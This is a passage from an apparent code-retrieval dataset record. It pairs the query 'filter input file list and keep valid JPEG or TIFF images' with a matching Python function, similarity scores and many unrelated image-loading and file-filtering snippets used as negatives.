Before calling convert most of the values are strings. Some additional\n# values are also calculated, see convert() for details. After calling\n# convert, most values are integers or floats where appropriat.\n # set through parser\n self.orientation = None\n self.tileheight = 0\n self.tilewidth = 0\n self.width = 0\n self.height = 0\n self.version = 0\n self.tile_sets = [] # TileSet\n self.layers = [] # WorldTileLayer <- what order? back to front (guessed)\n self.indexed_tiles = {} # {gid: (offsetx, offsety, image}\n self.object_groups = []\n self.properties = {} # {name: value}\n # additional info\n self.pixel_width = 0\n self.pixel_height = 0\n self.named_layers = {} # {name: layer}\n self.named_tile_sets = {} # {name: tile_set}\n self.map_file_name = \"\"\n self._image_loader = None", "def load_image_patch(filename):\n im = Image.open(filename) # .convert('L')\n width, height = im.size\n pixels = list(im.getdata())\n features = [pixels[i * width:(i + 1) * width] for i in range(height)]\n features = np.asarray(im, dtype=np.float32).flatten()\n features /= 255.0\n return features", "def read_image(filename, representation):\n img = imread(filename)\n img = int2float(img)\n if representation == GS_REP:\n img = rgb2gray(img)\n return img", "def load_image_file_like(self, file_like_obj, colorkey=None): # -> image\n raise NotImplementedError(u'This should be implemented in a inherited class')", "def load_image_file_like(self, file_like_obj, colorkey=None): # -> image\n raise NotImplementedError(u'This should be implemented in a inherited class')", "def init_image_info():\n if not os.path.exists(UPLOAD_FOLDER):\n os.makedirs(UPLOAD_FOLDER)", "def __init__(self, image_size=224):\n super().__init__()\n raster_settings = {'image_size': image_size, 'blur_radius': 0.0, 'faces_per_pixel': 1, 'bin_size': None, 'max_faces_per_bin': None, 'perspective_correct': False}\n raster_settings = dict2obj(raster_settings)\n self.raster_settings = raster_settings", "def load_image(self, image_id):\n # Load image\n# print(self.image_info[image_id]['path'])\n image = cv2.imread(self.image_info[image_id]['path'],cv2.IMREAD_GRAYSCALE) \n image = image[:,:, np.newaxis] #Add 1 dimension for grayscale images\n return image", "def image(self):\n # TODO: make sure this method works for png, gif, tiff\n if self.has_metadata:\n self.extract_metadata()\n tempdir_path = self.make_tempdir()\n tempfile_path = os.path.join(tempdir_path, self.filename)\n warnings.simplefilter('error', Image.DecompressionBombWarning)\n try: # Do image conversions\n img_in = Image.open(self.src_path)\n img_out = Image.frombytes(img_in.mode, img_in.size, img_in.tobytes())\n img_out.save(tempfile_path)\n self.src_path = tempfile_path\n except Exception as e: # Catch decompression bombs\n # TODO: change this from all Exceptions to specific DecompressionBombWarning\n self.add_error(e, \"Caught exception (possible decompression bomb?) while translating file {}.\".format(self.src_path))\n self.make_dangerous()\n self.add_file_string('Image file')\n self.set_property('processing_type', 'image')", "def load_annaation(self, image_id):\n info = self.image_info[image_id]\n # Get mask directory from image path\n mask_dir = os.path.join(os.path.dirname(os.path.dirname(info['path'])), \"masks\")\n\n\n m = skimage.io.imread(os.path.join(mask_dir, info['id']+'.png')) / 255\n\n return m", "def set_image(self):\r\n return loader.GFX['instructions_box']", "def __init__(self, group, image, x, y, tile_size):\n\t\tsuper().__init__(group, image, x, y, tile_size)", "def import_registry_settings(site):\n PROFILE_ID = 'profile-interlegis.portalmodelo.policy:default'\n setup = api.portal.get_tool('portal_setup')\n setup.runImportStepFromProfile(PROFILE_ID, 'plone.app.registry')" ]
[ "0.6126535", "0.610119", "0.5611701", "0.5601905", "0.55795354", "0.554965", "0.54795593", "0.5368683", "0.53583604", "0.53392506", "0.5296245", "0.525413", "0.525413", "0.5213607", "0.5202142", "0.51820916", "0.51820916", "0.51820916", "0.51808995", "0.5156906", "0.5153215", "0.512968", "0.512968", "0.5125932", "0.51160985", "0.51145786", "0.5098552", "0.5091045", "0.5075054", "0.50672543", "0.50628537", "0.50479895", "0.50423056", "0.5042086", "0.504077", "0.5021402", "0.5013127", "0.5012614", "0.50004125", "0.49943146", "0.4987496", "0.49874124", "0.49819687", "0.49626672", "0.49575067", "0.4949178", "0.49454367", "0.49315512", "0.49268997", "0.49193117", "0.49144447", "0.49140024", "0.49107996", "0.4909449", "0.49007422", "0.4889291", "0.48859265", "0.4885368", "0.48852867", "0.4881438", "0.48692146", "0.48666787", "0.4856253", "0.48560485", "0.48488545", "0.48401704", "0.48365328", "0.48365328", "0.4825166", "0.48244274", "0.48226112", "0.48222485", "0.48215404", "0.4818413", "0.4812128", "0.4811772", "0.48090637", "0.48072907", "0.48013374", "0.48005486", "0.47973627", "0.47939783", "0.47907323", "0.47841895", "0.47746143", "0.47723445", "0.4771962", "0.47714326", "0.47714326", "0.47701114", "0.4765229", "0.47637597", "0.47637597", "0.4759704", "0.47568965", "0.4753762", "0.47504622", "0.47414607", "0.473265", "0.47250515", "0.4724442" ]
0.0
-1
Filter input file list and keep valid JPEG or TIFF images.
def get_input_files(): raw_list = abspath(get('input_files')) valid_types = ['image/jpeg', 'image/tiff'] images = [x for x in raw_list if mimetypes.guess_type(x)[0] in valid_types] print('* Input images: {}'.format(len(images))) return images
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def filterImages(files, cfg):\r\n regex = \"\\.(\" + \"|\".join(cfg.image_formats) + \")$\"\r\n #filter(lambda s: re.match(regex, s), files)\r\n return [s for s in files if re.findall(regex, s)]", "def filter_bad_names(self, images):\r\n good_images = []\r\n for image in images:\r\n if self.is_valid_filename(image):\r\n good_images.append(image)\r\n return good_images if len(good_images) > 0 else None", "def filelist_cleaner(lista, dataset=''):\n if dataset == 'ncar':\n cleaned = [ l for l in lista if '.nc' not in l ]\n if dataset == 'bufr':\n cleaned = [ l for l in lista if '.bfr' in l ]\n if 'era5' in dataset:\n cleaned = [ l for l in lista if '.nc' not in l and '.conv.' in l ]\n else:\n cleaned = lista\n \n return cleaned", "def check_files(self):\n for f in self.filenames:\n img = cv2.imread(f, int(self.color))\n if img is None:\n os.remove(f)", "def filterAudioFilesFromFilelist(filelist):\n audioFileList = []\n for audioFilter in filelist:\n audioRoot, audioExt = os.path.splitext(audioFilter)\n if audioExt in ['.wav', '.aiff', '.aif']:\n audioFileList.append(audioFilter)\n # end for loop\n return audioFileList", "def check_files(self):\n print('checking files')\n for f in self.filenames:\n img = cv2.imread(f, int(self.color))\n if img is None:\n os.remove(f)", "def filter_images(self, images):\n status = self.day_or_night(images[0][1],\n self.gray_refs['day'][0],\n self.gray_refs['night'][0])\n print status\n exclusions = self.gray_refs[status]\n threshold = 0.7\n last_ref = None\n result = []\n\n for filename, gray_img, raw_img in images:\n skip = False\n if last_ref:\n dist = ssim(gray_img, exclusions[last_ref], multichannel=False)\n if dist > threshold:\n skip = True\n\n if not skip:\n for i, gray_ref in enumerate(exclusions):\n if i == last_ref:\n continue\n dist = ssim(gray_img, gray_ref, multichannel=False)\n if dist > threshold:\n skip = True\n last_ref = i\n break\n\n if not skip:\n if (time.time() - self.last_notify) > notify_thresh:\n send_alert('Alert! Motion detected near front door.')\n self.last_notify = time.time()\n result.append((filename, gray_img, raw_img))\n return result", "def FilterLogfiles(files):\n log_files = list(files)\n for file_path in files:\n file_name = os.path.basename(file_path)\n if file_name == _KERNEL or file_name.endswith(_IMG_FILE_EXTENSION):\n log_files.remove(file_path)\n return log_files", "def checkLists(original_list, path, prefix, suffix):\n\n new_list = []\n for image in original_list:\n image = image.strip()\n if os.path.exists(path+'/'+prefix+image+suffix):\n new_list.append(image)\n else:\n logging.info('\\n' + str(image)+ '.fits not being processed due to error in image.\\n')\n logging.info(\"\\n#####################################################################\")\n logging.info(\"#####################################################################\")\n logging.info(\"\")\n logging.info(\" WARNING: \" + str(image) + \" .fits was removed from a list after a checkLists call.\")\n logging.info(\" An iraf task may have failed. \")\n logging.info(\"\")\n logging.info(\"#####################################################################\")\n logging.info(\"#####################################################################\\n\")\n\n\n pass\n\n return new_list", "def _filtering_photos(queue):\n\n while True:\n # Retrieves one list from the queue and splits the list.\n data = queue.get()\n picture = data[0]\n curdir = data[1]\n\n picture_name = basename(picture)\n\n # Filters the image.\n Filter(picture, join(curdir, \"filtered\"))", "def _process_image_files(self, input_files):\n # Handle single file-object as arg.\n if not isinstance(input_files, list):\n input_files = [input_files]\n self._check_batch_size(input_files)\n # Handle unnames images as lists of file objects. Named by index in list.\n image_files = []\n for i, tup in enumerate(input_files):\n if not isinstance(tup, tuple):\n image_files.append((tup, str(i)))\n assert hasattr(image_files[i][0], 'read'), (\n 'image_files[%d] has wrong type: %s. Must be file-object with read method.') % (\n i, type(image_files[i][0]))\n else: # already tuples passed in.\n image_files.append(tup)\n # Resize any images such that the min dimension is in range.\n if CAN_RESIZE:\n for i, image_tup in enumerate(image_files):\n image_files[i] = self._resize_image_tuple(image_tup)\n # Return a list of (bytes, name) tuples of the encoded image bytes.\n image_data = []\n for image_file in image_files:\n image_data.append((bytes(image_file[0].read()), image_file[1]))\n return image_data", "def _filter_file_list(files, local_metadata, remote_metadata):\n def _is_tracked(filename, metadata):\n \"\"\"\n Is the filename tracked in the remote metadata dict.\n The file may be not even locally tracked yet\n \"\"\"\n current_local_sha = local_metadata.get(filename, None)\n current_remote_sha = metadata.get(filename, None)\n return current_local_sha is not None \\\n and current_remote_sha is not None \\\n and current_local_sha == current_remote_sha\n\n def _is_inside_ignored_dir(filename):\n \"\"\" Is the filename inside any of the IGNORE_DIRS list \"\"\"\n ignore_dirs = ['./' + x for x in IGNORE_DIRS]\n return any([filename.startswith(x) for x in ignore_dirs])\n\n def _has_ignored_extension(filename):\n return any([ext in IGNORE_EXTENSIONS\n for ext in filename.split('.')[1:]])\n\n files = [f for f in files\n if not _is_inside_ignored_dir(f)\n and not _has_ignored_extension(f)\n and not _is_tracked(f, remote_metadata)]\n return files", "def filter_list(to_process_list):\n log_file_list = [file for file in to_process_list if \"tar\" not in file]\n tar_file_list = [file for file in to_process_list if \"tar\" in file]\n return log_file_list, tar_file_list", "def filter_target_extensions(self, files_dict):\n files_filtered = defaultdict(list)\n supported_formats = self.sox_get_supported_formats()\n logging.info('Filtering audio files ...')\n paths = list(files_dict.keys())\n\n for path in paths:\n if not path.endswith('letmehear'):\n files = sorted(files_dict[path])\n for f in files:\n if os.path.splitext(f)[1].lstrip('.').lower() in supported_formats:\n files_filtered[path].append(f)\n return files_filtered", "def images_media_filter(hash_str, mime_type):\n return mime_type in MIME_TO_EXTESION_MAPPING", "def check_files(self):\n print('checking files')\n for f in tqdm(self.filenames):\n img = cv2.imread(f, int(self.color))\n if img is None:\n os.remove(f)", "def filter_thumbnail_only(_list):\n result = list()\n for count, href in enumerate(_list):\n if count > 15:\n break\n if get_verified_response(get_thumbnail(href)).status == 200:\n result.append(href)\n return result", "def remove_unactionable_images(data):\n os.makedirs(os.path.join(data, 'removed'), exist_ok=True)\n for product in os.listdir(data):\n if product.startswith('product') is False:\n continue\n path = os.path.join(data, product)\n if os.path.isdir(path) is False:\n continue\n if is_useful(path, 0.5) is False:\n print('\\tRemoving ' + path)\n shutil.copy(os.path.join(path, 'TCI.tiff'),\n os.path.join(data, 'removed', product + '.tiff'))\n shutil.rmtree(path)\n else:\n shutil.copy(os.path.join(path, 'TCI.tiff'),\n os.path.join(data, product + '.tiff'))", "def _filter_imgs(self, min_size=32):\n valid_inds = []\n for i, img_info in enumerate(self.img_infos):\n # Filter out empty images\n if img_info['ann']['bboxes'].shape[0] > 0:\n if min(img_info['width'], img_info['height']) >= min_size:\n valid_inds.append(i)\n return valid_inds", "def get_filtered_file_names_list(_file_names_list, _gender=None, _noise=None, _scale=None):\n _file_names_split_list = [re.split('[/_]+', fname) for fname in _file_names_list]\n\n if _gender:\n if type(_gender) == str:\n _gender = [_gender]\n _file_names_split_list = [f_name for f_name in _file_names_split_list if f_name[-3] in _gender]\n\n if _noise:\n if type(_noise) == str:\n _noise = [_noise]\n _file_names_split_list = [f_name for f_name in _file_names_split_list if f_name[-2] in _noise]\n\n if _scale:\n if type(_scale) == str:\n _scale = [_scale]\n _file_names_split_list = [f_name for f_name in _file_names_split_list if f_name[-1] in _scale]\n\n _file_names_list = ['_'.join(['/'.join(fname_split[:3]), fname_split[-2], fname_split[-1]])\n for fname_split in _file_names_split_list]\n\n return _file_names_list", "def make_image_list(directory):\r\n\tonly_files = [file for file in listdir(directory) if isfile(join(directory, file))]\r\n\treturn only_files", "def create_file_list(params):\n data_dir = params.get('data_dir', '')\n params['file_list'] = \".tmp.txt\"\n imgtype_list = {'jpg', 'bmp', 'png', 'jpeg', 'rgb', 'tif', 'tiff'}\n with open(params['file_list'], \"w\") as fout:\n tmp_file_list = os.listdir(data_dir)\n for file_name in tmp_file_list:\n file_path = os.path.join(data_dir, file_name)\n if imghdr.what(file_path) not in imgtype_list:\n continue\n fout.write(file_name + \" 0\" + \"\\n\")", "def __clean(path, pattern = '.tiff'):\n for f in os.listdir(path):\n if re.search(pattern, f):\n os.remove(os.path.join(path, f))\n\n print(\"directory cleaned\")", "def filter_images(history, whitelist):\n docker_client = docker.client.APIClient()\n local_images = common.get_local_images(docker_client)\n approved_images = set(local_images) - set(whitelist)\n return {image: timestamp for image, timestamp in history.items() if image in approved_images}", "def _filter_imgs(self, min_size=32):\r\n valid_inds = []\r\n ids_with_ann = set(_['image_id'] for _ in self.coco.anns.values())\r\n for i, img_info in enumerate(self.img_infos):\r\n if self.filter_empty_gt and self.img_ids[i] not in ids_with_ann:\r\n continue\r\n if min(img_info['width'], img_info['height']) >= min_size:\r\n valid_inds.append(i)\r\n return valid_inds", "def collect_image_files():\n negs = [] # Non image files found\n for filename in os.listdir('.'):\n if filename.lower().endswith('.jpg') or filename.lower().\\\n endswith('.jpeg'):\n jpg_files.append(filename)\n elif filename.lower().endswith('.gif'):\n gif_files.append(filename)\n elif filename.lower().endswith('.png'):\n png_files.append(filename)\n else:\n negs.append(filename)\n return negs", "def _filter_imgs(self, min_size=32):\n\n valid_inds = []\n for i, img_info in enumerate(self.data_infos):\n if min(img_info[\"width\"], img_info[\"height\"]) < min_size:\n continue\n if self.filter_empty_gt and len(img_info[\"ann\"][\"bboxes\"]) > 0:\n valid_inds.append(i)\n else:\n valid_inds.append(i)\n\n return valid_inds", "def filterFiles(groupDict, fileList):\n for fl in fileList:\n cleanFile = cleanUpPath(fl)\n dirsList = PurePath(fl).parts\n try:\n # Find the first libs directory.\n index = dirsList.index(\"libs\")\n # Any child of libs directory is a group.\n grp = dirsList[index + 1]\n groupDict[grp].append(cleanFile)\n except ValueError:\n groupDict[GRP_UNFILTERED].append(cleanFile)", "def _filter_imgs(self, min_size=32):\n valid_inds = []\n for i, img_info in enumerate(self.img_infos):\n if min(img_info['width'], img_info['height']) >= min_size:\n valid_inds.append(i)\n return valid_inds", "def _filter_imgs(self, min_size=32):\n valid_inds = []\n for i, img_info in enumerate(self.img_infos):\n if min(img_info['width'], img_info['height']) >= min_size:\n valid_inds.append(i)\n return valid_inds", "def swarpfilter(d, dir, directory, images, keys, filter, lamp, camera, done, output, type):\n filt = images.files_filtered(FWINAME=filter, FLSPECTR=lamp, CAMNAME=camera, HISTORY=done)\n files = [d + x for x in filt.tolist()]\n print(files)\n if files:\n swarp(files, output=directory + '/' + output + '.fits', celestial_type=type)", "def _filter_mrpack_files(file_list: List[MrpackFile], mrpack_install_options: MrpackInstallOptions) -> List[MrpackFile]:\n filtered_list: List[MrpackFile] = []\n for file in file_list:\n if \"env\" not in file:\n filtered_list.append(file)\n continue\n\n if file[\"env\"][\"client\"] == \"required\":\n filtered_list.append(file)\n if file[\"env\"][\"client\"] == \"optional\" and file[\"path\"] in mrpack_install_options.get(\"optionalFiles\", []):\n filtered_list.append(file)\n\n return filtered_list", "def _filter_imgs(self, min_size=32):\n valid_inds = []\n ids_with_ann = set(_['image_id'] for _ in self.coco.anns.values())\n for i, img_info in enumerate(self.img_infos):\n if self.img_ids[i] not in ids_with_ann:\n continue\n if min(img_info['width'], img_info['height']) >= min_size:\n valid_inds.append(i)\n return valid_inds", "def _filter_imgs(self, min_size=32):\n valid_inds = []\n ids_with_ann = set(_['image_id'] for _ in self.coco.anns.values())\n for i, img_info in enumerate(self.img_infos):\n if self.img_ids[i] not in ids_with_ann:\n continue\n if min(img_info['width'], img_info['height']) >= min_size:\n valid_inds.append(i)\n return valid_inds", "def _filter_imgs(self, min_size=32):\n valid_inds = []\n ids_with_ann = set(_['image_id'] for _ in self.coco.anns.values())\n for i, img_info in enumerate(self.img_infos):\n if self.img_ids[i] not in ids_with_ann:\n continue\n if min(img_info['width'], img_info['height']) >= min_size:\n valid_inds.append(i)\n return valid_inds", "def find_all_images_in_folder(path_to_folder):\n import os, os.path\n \n imgs = [] \n valid_images = [\".jpg\",\".gif\",\".png\",\".jpeg\"]\n for f in os.listdir(path_to_folder):\n pre,ext = os.path.splitext(f) \n if(ext.lower() in valid_images) and not (pre.endswith(\"thumbnail\")):\n #imgs.append( [os.path.join(path_to_folder,pre),ext] )\n imgs.append( [pre ,ext] )\n return imgs", "def default_filter(files):\n\n if '1.mkv' in files and '2.mkv' in files and 'Labels.json' in files:\n return True\n\n return False", "def find_uglies():\n for file_type in ['neg']:\n for img in os.listdir(file_type):\n for ugly in os.listdir('uglies'):\n try:\n current_image_path = str(file_type) + '/'+str(img)\n ugly = cv2.imread('uglies/' + str(ugly))\n question = cv2.imread(current_image_path)\n if ugly.shape == question.shape and not(np.bitwise_xor(ugly, question).any()):\n print('That is one ugly pic! Deleting!')\n print(current_image_path)\n os.remove(current_image_path)\n except Exception as e:\n print(str(e))", "def space_cleaning():\n for file in os.listdir(\".\"):\n if file.endswith(\".png\"):\n os.remove(file)", "def filters(im, filter_list=[\"MedianFilter\"]):\n out = im\n for filter_name in filter_list:\n out = out.filter(getattr(ImageFilter, filter_name))\n return out", "def get_filtered_list_without_temporary_files(self, file_list=None):\n\t\ttemp_file_regex = re.compile(r'.*\\~\\$.*')\n\t\ttry:\n\t\t\ttemporary_files = list(filter(temp_file_regex.search, file_list))\n\t\t\tfiles_filtered = list(set(file_list) - set(temporary_files))\n\t\t\treturn files_filtered\n\t\texcept:\n\t\t\treturn file_list", "def clean_filelist(fnlist):\n cntClean = 0\n for fn in fnlist:\n try:\n with h5py.File(fn,\n 'r+') as handle: # ref: https://docs.h5py.org/en/stable/high/file.html?highlight=h5py.File#h5py.File\n if args.groupName in list(handle.keys()): # clean if found any group named 'Analyses'\n del handle[args.groupName]\n cntClean += 1\n except: ## avoid corrupted fast5 files\n pass\n return cntClean", "def negative_filtering(patterns: list, file_list):\n if len(patterns) == 0:\n return file_list\n prog = re.compile(patterns.pop())\n it = (i for i in file_list if not prog.search(i))\n return negative_filtering(patterns, it)", "def _filter_files(file_dir: Union[str, Path], is_viya4: Optional[bool] = False) -> list:\n file_names = []\n file_names.extend(sorted(Path(file_dir).glob(\"*.json\")))\n if is_viya4:\n file_names.extend(sorted(Path(file_dir).glob(\"score_*.py\")))\n file_names.extend(sorted(Path(file_dir).glob(\"*.pickle\")))\n # Include H2O.ai MOJO files\n file_names.extend(sorted(Path(file_dir).glob(\"*.mojo\")))\n if file_names:\n return file_names\n else:\n raise FileNotFoundError(\n \"No valid model files were found in the provided file directory.\"\n )", "def test_invalid_prompt_files(self):\n invalid_files = [\n \"p01.txt\",\n \"abc.txt\",\n \"p000001s000001.mp3\",\n \"p000001s000001n001.txt\",\n \"u000001.txt\"\n ]\n filtered_files = list(filter(format.is_prompt_file, invalid_files))\n\n assert len(filtered_files) == 0", "def test_files_from_plate():\n plate_path = os.path.join(TEST_PATH_IX, \"test-plate-1\")\n output = filelister_ix.files_from_plate(plate_path)\n assert len(output) > 0\n for f in output:\n assert f.endswith(\".tif\")", "def get_good(filenames, good=True):\n return filter_filenames(filenames, [\"good\"], not good)", "def get_lst_images(file_path):\n return [i for i in os.listdir(file_path) if i != '.DS_Store']", "def compress_to_tiffs(source, remove_old_files):\n os.chdir(source)\n subprocess.Popen(\"i_view32.exe *.bmp /tifc=5 /convert=*.tif\", shell=True,\n stdout=subprocess.PIPE, env={'PATH': os.getenv('PATH')}).stdout.read()\n if remove_old_files == 'yes':\n list_of_files_in_the_folder = os.listdir(source)\n for files in list_of_files_in_the_folder:\n name, ext = os.path.splitext(files)\n if ext.lower() == \".bmp\":\n os.remove(os.path.join(source, files))", "def CollectImageFilenames(self):\n # Match all image extensions but not the filenmae of the of beamer pdf\n regex_img = re.compile(\n r'^(?!{}).*\\.(jpg|png|pdf)'.format(self._filename.replace('.tex', '')))\n # regex_img = re.compile(r'^(?!test)'.format(self._filename.replace('.tex', '')))\n files = [f for f in os.listdir(os.getcwd())\n if regex_img.search(f)]\n return files", "def _purge_except_yaml(self, list_files): \n yaml_files = []\n for filepath in list_files:\n if filepath.endswith(\".yaml\"):\n yaml_files.append(filepath)\n\n return yaml_files", "def clean_dir_filtered(dr, filters):\n # type: (path, List[str]) -> None\n for f in os.listdir(dr):\n for fltr in filters:\n if fltr in f:\n os.remove(f)\n continue", "def _identify_files_to_remove(self, job_result_filepaths, params):\r\n return []", "def _identify_files_to_remove(self, job_result_filepaths, params):\r\n return []", "def _identify_files_to_remove(self, job_result_filepaths, params):\r\n return []", "def get_exlusions(self):\n files = os.listdir(self.exclusions_path)\n for filename in files:\n image = cv2.imread(self.exclusions_path + filename)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (21,21), 0)\n\n if filename.startswith('day'):\n self.gray_refs['day'].append(gray)\n elif filename.startswith('night'):\n self.gray_refs['night'].append(gray)", "def filename_filter ( self, filename, _fnmatch=fnmatch.fnmatch ):\n return all (\n not _fnmatch ( filename, pat ) for pat in self.FILENAMES_IGNORE\n )", "def preprocess_images(images_dir, image_dims, logger):\n find_str = images_dir + '/**/*.jpg'\n images = glob.glob(find_str, recursive=True)\n num_samples = get_num_samples(images_dir)\n\n # Load in the already processed file list\n proc_list_path = images_dir + '/processed_list.txt'\n if os.path.isfile(proc_list_path):\n with open(proc_list_path) as f:\n proc_list = f.read().split('\\n')\n else:\n proc_list = []\n \n i = 1\n for image in images:\n image_name = image.split('/')[-1]\n if image not in proc_list:\n logger.info(\"Processing %s\", \" {} - {}/{}\".format(\n image_name, i, num_samples))\n try:\n processed_image = ImageCheck.check_and_crop(image)\n except (ImageCheck.ObjectMissingError,\n ImageCheck.WormMissingError,\n ImageCheck.MultipleWormsError,\n ImageCheck.TooBlurryError) as e:\n logger.info(\"Processing Error: %s\",\n \"Image at: \\n{} \\n Produced error: {} \\n Removing\"\n \" image\".format(image, e))\n os.remove(image)\n i = i + 1\n continue\n cv2.imwrite(image, processed_image)\n with open(proc_list_path, 'a') as f:\n f.write(image + '\\n')\n else:\n logger.info(\"Skipping %s\", \" {} (already processed) - {}/{}\".format(\n image_name, i, num_samples))\n i = i + 1", "def checksImages(self):\n metadata=[]\n for image in self.meta['sources']:\n with rasterio.open(image) as src:\n metaData=src.meta\n \n assert metaData['driver'] == 'GTiff', \"Driver is not supported: {0}\".format(metaData['driver'])\n assert metaData['count'] == len(self.meta['bandNames']), \"Nbands incorrect, expected: {0}, {1} provided\".format(metaData['count'],len(self.meta['bandNames']))\n \n metadata.append({'dtype': metaData['dtype'], 'driver': metaData['driver'], 'nodata': metaData['nodata'], 'nBands': metaData['count'],'crs': src.crs.to_string()})\n \n assert len(set([item['dtype'] for item in metadata])) == 1, \"Images list dtypes aren't compatibles. Expected: 1, {1} provided\".format(metaData['count'],len(set([item['dtype'] for item in metadata])))\n assert len(set([item['driver'] for item in metadata])) == 1, \"Images list drivers aren't compatibles. Expected: 1, 1 provided\".format(metaData['count'],len(set([item['driver'] for item in metadata])))\n assert len(set([item['nodata'] for item in metadata])) == 1, \"Images list nodata values aren't compatibles. Expected: 1, {1} provided\".format(metaData['count'],len(set([item['nodata'] for item in metadata])))\n assert len(set([item['nBands'] for item in metadata])) == 1, \"Images list nBands number aren't compatibles. Expected: 1, {1} provided\".format(metaData['count'],len(set([item['nBands'] for item in metadata])))\n assert len(set([item['crs'] for item in metadata])) == 1, \"Images list crs aren't compatibles. Expected: 1, {1} provided\".format(metaData['count'],len(set([item['crs'] for item in metadata]))) \n return metadata[0]", "def raw_clean(delete, invert, raw_dir, trash, raw_ext):\n raw_image_ext = f\".{raw_ext.upper()}\"\n\n # Basic user input check\n if not os.path.exists(raw_dir):\n print(f\"No '{raw_dir}' directory found!\")\n sys.exit(1)\n\n # Get list of images in different formats\n image_dir = os.getcwd()\n raw_dir = os.path.abspath(raw_dir)\n\n jpgs = set(\n [f.split('.')[0]\n for f in os.listdir(image_dir) if f.endswith(COMP_IMAGE_EXT)]\n )\n raws = set(\n [f.split('.')[0]\n for f in os.listdir(raw_dir) if f.endswith(raw_image_ext)]\n )\n\n # Find missing pairs\n paired = raws & jpgs\n jpgs_without_raw = jpgs - paired\n raws_without_jpg = raws - paired\n\n # Decide what set of files to process\n if not invert:\n images = raws_without_jpg\n workdir = raw_dir\n ext = raw_image_ext\n else:\n images = jpgs_without_raw\n workdir = image_dir\n ext = COMP_IMAGE_EXT\n\n # Process files\n for image in images:\n image_path = os.path.join(workdir, f\"{image}{ext}\")\n if not trash and not delete:\n print(f\"No pair found for '{image_path}' \")\n elif delete:\n print(f\"Deleting '{image_path}'...\")\n os.unlink(image_path)\n elif trash:\n print(f\"Trashing '{image_path}'...\")\n send2trash.send2trash(image_path)", "def preprocessfolder(self):\n imgs, _ = getFilesAndHdf(str(self.in_directory.text()))\n self.img_list = sorted(imgs)\n self.updateImageGroups()", "def load_test_words():\n return [f.rstrip('.png\\n') for f in os.listdir(IMG_PATH) if\n ((os.path.splitext(f)[-1] == '.png') & (int(f[0:3]) > 304))]", "def filter_captured_urls(urls_files, url_list_file):\n captured_urls = load_captured_urls(url_list_file)\n \n to_capture = list(filter(lambda d: d['url'] not in captured_urls, urls_files))\n \n return to_capture", "def compress_list(src_list):\n return [item for item in src_list if item]", "def get_img_list(self):\n if self.list_flag == \"train\":\n train_list_all = [line.rstrip('\\n')[:-4] for line in open(os.path.join(self.dataset_dir, 'split', self.list_flag + '-list.txt'))]\n train_list_delete = [line.rstrip('\\n') for line in open(os.path.join(self.dataset_dir, 'split', 'Mesh_overlay_train_error_delete.txt'))]\n print(\"Train delete %d images\" % len(train_list_delete))\n\n self.img_list_all = [x for x in train_list_all if x not in train_list_delete]\n elif self.list_flag == \"val\":\n valid_list_all = [line.rstrip('\\n')[:-4] for line in open(os.path.join(self.dataset_dir, 'split', 'validation-list.txt'))]\n val_list_delete = [line.rstrip('\\n') for line in open(os.path.join(self.dataset_dir, 'split', 'Mesh_overlay_val_error_delete.txt'))]\n self.img_list_all = [x for x in valid_list_all if x not in val_list_delete]\n print(\"Val delete %d images.\" % len(val_list_delete))\n\n elif self.list_flag == 'test':\n im_list = os.listdir(os.path.join(self.dataset_dir, 'images'))\n self.img_list_all = [x[:-4] for x in im_list]\n\n return self.img_list_all", "def missed_conversions(in_dir, out_dir, ignore_masks=False):\n in_paths = os.walk(in_dir)\n out_paths = os.walk(out_dir)\n missed = []\n for ((in_path, _, in_files), (_, _, out_files)) in \\\n zip(in_paths, out_paths):\n in_files = filter(is_cellomics_image, in_files)\n if ignore_masks:\n in_files = filter(lambda fn: not is_cellomics_mask(fn), in_files)\n in_files = sorted(in_files)\n out_files = set(out_files)\n for infn in in_files:\n outfn = infn[:-4] + '.tif'\n if outfn not in out_files:\n missed.append(os.path.join(in_path, infn))\n return missed", "def process_images():\n create_dirs()\n for root, dirs, files in os.walk(IN):\n for name in files:\n if name[0] == '.':\n continue\n process_image(name)", "def imgFiltering(inputPath, outputPath):\n\t# open the target image\n\tpollenImg = IJ.openImage(inputPath)\n\t\n\t# Create duplicator\n\tduplicator = Duplicator()\n\t\n\t# Duplicate the image with channel 1\n\tpollenImgCopy = duplicator.run(pollenImg, 1, 1, 1, 1, 1, 1);\n\t\n\t# set auto threshold\n\t# IJ.setAutoThreshold(pollenImgCopy, \"Default dark\");\n\t\n\t# set threshold\n\tIJ.setThreshold(pollenImgCopy, 17000, 65520)\n\t\n\t# Call the Thresholder to convert the image to a mask\n\tIJ.run(pollenImgCopy, \"Convert to Mask\", \"\")\n\t\n\t# create result table\n\trt = ResultsTable()\n\t\n\t# create particle analyzer\n\tpAnalyzer = ParticleAnalyzer(ParticleAnalyzer.SHOW_NONE, Measurements.ALL_STATS, rt, 20.0, 1000.0, 0.5 ,1.0)\n\t\n\t# Analyze the particle\n\tpAnalyzer.analyze(pollenImgCopy)\n\t\n\t# Save results as csv\n\trt.saveAs(outputPath)", "def test_filter_files(self):\n expected = [\n (\"/subdir1/fichier1\", False),\n (\"/subdir1/fichier4\", False),\n (\"/subdir1/subsubdir1\", False),\n ]\n files = [\n (\"/subdir1/fichier1\", False),\n (\"/subdir2/fichier2\", False),\n (\"/subdir2/fichier3\", False),\n (\"/subdir1/fichier4\", False),\n (\"/subdir1/subsubdir1/fichier1\", False),\n (\"/subdir1/subsubdir1/\", False),\n ]\n self.assertEqual(\n list(self.path_translator.filter_files(files, \"/subdir1\")),\n expected)", "def filter_img(img, new_img, f):\n\n datas = img.getdata()\n new_data = []\n for item in datas:\n if f(item[0]) and f(item[1]) and f(item[2]):\n new_data.append((0, 0, 0, 0))\n else:\n new_data.append(item)\n new_img.putdata(new_data)", "def filter(self):\n for f in FileHelper.ALL_PATHS:\n media_obj = MediaObject(FileHelper.get_url(f), FileHelper.get_title(f), FileHelper.get_media_type(f), FileHelper.get_icon(f), FileHelper.get_duration(f), FileHelper.get_ctype(f))\n _id = media_obj.uuid\n if media_obj.media_type == \"image\":\n DB.IMAGES[_id] = media_obj\n elif media_obj.media_type == \"audio\":\n DB.MUSIC[_id] = media_obj\n elif media_obj.media_type == \"video\":\n DB.VIDEOS[_id] = media_obj\n else:\n print \"File '%s' doesn't play nice.\" % (f)", "def ingest_latests(last_timestamp, file_list):\n def _iterator(file_name):\n # Is a radar image file\n if 